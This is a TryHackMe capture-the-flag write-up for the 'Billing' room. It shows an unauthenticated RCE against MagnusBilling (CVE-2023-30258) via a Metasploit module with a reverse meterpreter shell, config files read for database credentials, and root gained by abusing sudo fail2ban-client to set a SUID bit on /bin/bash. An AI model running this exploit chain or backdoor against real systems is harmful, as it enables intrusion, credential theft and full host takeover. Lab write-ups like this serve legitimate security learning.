Billing

Some mistakes can be costly.

BillingTryHackMe

Hey, fellow hackers! 🏴‍☠️

Today, we're setting sail into the Billing room on TryHackMe, where our mission is to navigate through vulnerabilities, uncover flags and claim root access! 💀⚔️

Reconnaissance - Scouting the Enemy 🚀

Every great conquest starts with intelligence gathering. A thorough network scan helps identify open services and potential entry points.

I use Nmap for this task:

 r1pp3r 🔱 god2eye ~/Documents/tryhackme/billing 
  λ nmap -sC -sV 10.10.137.233 | tee nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 12:52 IST
Nmap scan report for 10.10.137.233
Host is up (0.35s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_  256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.137.233/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
3306/tcp open  mysql   MariaDB (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds

🕵️ Findings :

• 22/tcp - OpenSSH 8.4p1 (Debian)

• 80/tcp - Apache 2.4.56 hosting a web application (/mbilling/)

• 3306/tcp - MariaDB service, access denied (likely hosting sensitive VoIP data)

The presence of /mbilling/ suggests the system is running MagnusBilling, a widely used VoIP billing platform. This discovery guides our next steps towards web exploitation.

Initial Access - Breaking In! 🏴‍☠

MagnusBilling Login

Exploiting MagnusBilling (CVE-2023-30258)

A quick OSINT search reveals that MagnusBilling has an Unauthenticated Remote Command Execution (RCE) vulnerability (CVE-2023-30258) . Leveraging this flaw provides us with an entry point into the system.

Time to fire up Metasploit 🔥

msfconsole
search magnusbilling
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS <machine_ip>
set LHOST <attacker_ip>
set LPORT 6969
exploit

🎯 Boom! We're in!

• Successfully executed RCE 🎉, gaining a meterpreter shell 💻

Let’s stabilize our foothold and get comfy:

meterpreter > shell

which python3
/usr/bin/python3

python3 -c "import pty;pty.spawn('/bin/bash')"
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home/magnus
asterisk@Billing:/home/magnus$ cat user.txt 
cat user.txt
[REDACTED]

With access as magnus, we begin system enumeration and credential discovery.

Retrieving the user flag! Yo-ho-ho!, Let’s press on. 🏴‍☠️

Privilege Escalation - Climbing the Ladder 🏆

Hunting for Credentials and Misconfigurations

A deep dive into configuration files often yields useful information. Looking into key application settings, we find potential credentials:

cd /var/www/html/mbilling/protected/config
cat main.php

Additionally, another configuration file linked to Asterisk contains database credentials:

cat /etc/asterisk/res_config_mysql.conf

Extracted credentials—💰 Jackpot!

dbuser = mbillingUser
dbpass = BLOGYwvtJkI7uaX5

Sadly, no instant root access. I continued exploring for privilege escalation paths—our journey is far from over! 🔥

Checking sudo privileges:

asterisk@Billing:/home$ sudo -l
sudo -l
Matching Defaults entries for asterisk on Billing:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client

Observation:

🎯 Bingo! The asterisk user can execute /usr/bin/fail2ban-client as root without a password.

By modifying fail2ban’s SSH action, we introduce a SUID backdoor:

asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client status
Status
|- Number of jail:	8
`- Jail list:	ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
<n iptables-multiport actionban 'chmod +s /bin/bash'
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
<client get sshd action iptables-multiport actionban
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
1

Verifying changes:

asterisk@Billing:/home$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash

Executing /bin/bash -p now elevates us to root. 🚀 Now, let’s take the throne!

asterisk@Billing:/home$ /bin/bash -p
/bin/bash -p
bash-5.1# whoami
whoami
root
bash-5.1# cat /root/root.txt
cat /root/root.txt
[REDACTED]

Conclusion 🏁

This exercise highlights the real-world attack chain used to compromise a vulnerable system.

Final words? Stay sharp, keep hacking, and always test your defenses! ⚔️🔥

Happy hacking, fellow pirates! 🏴‍☠️💻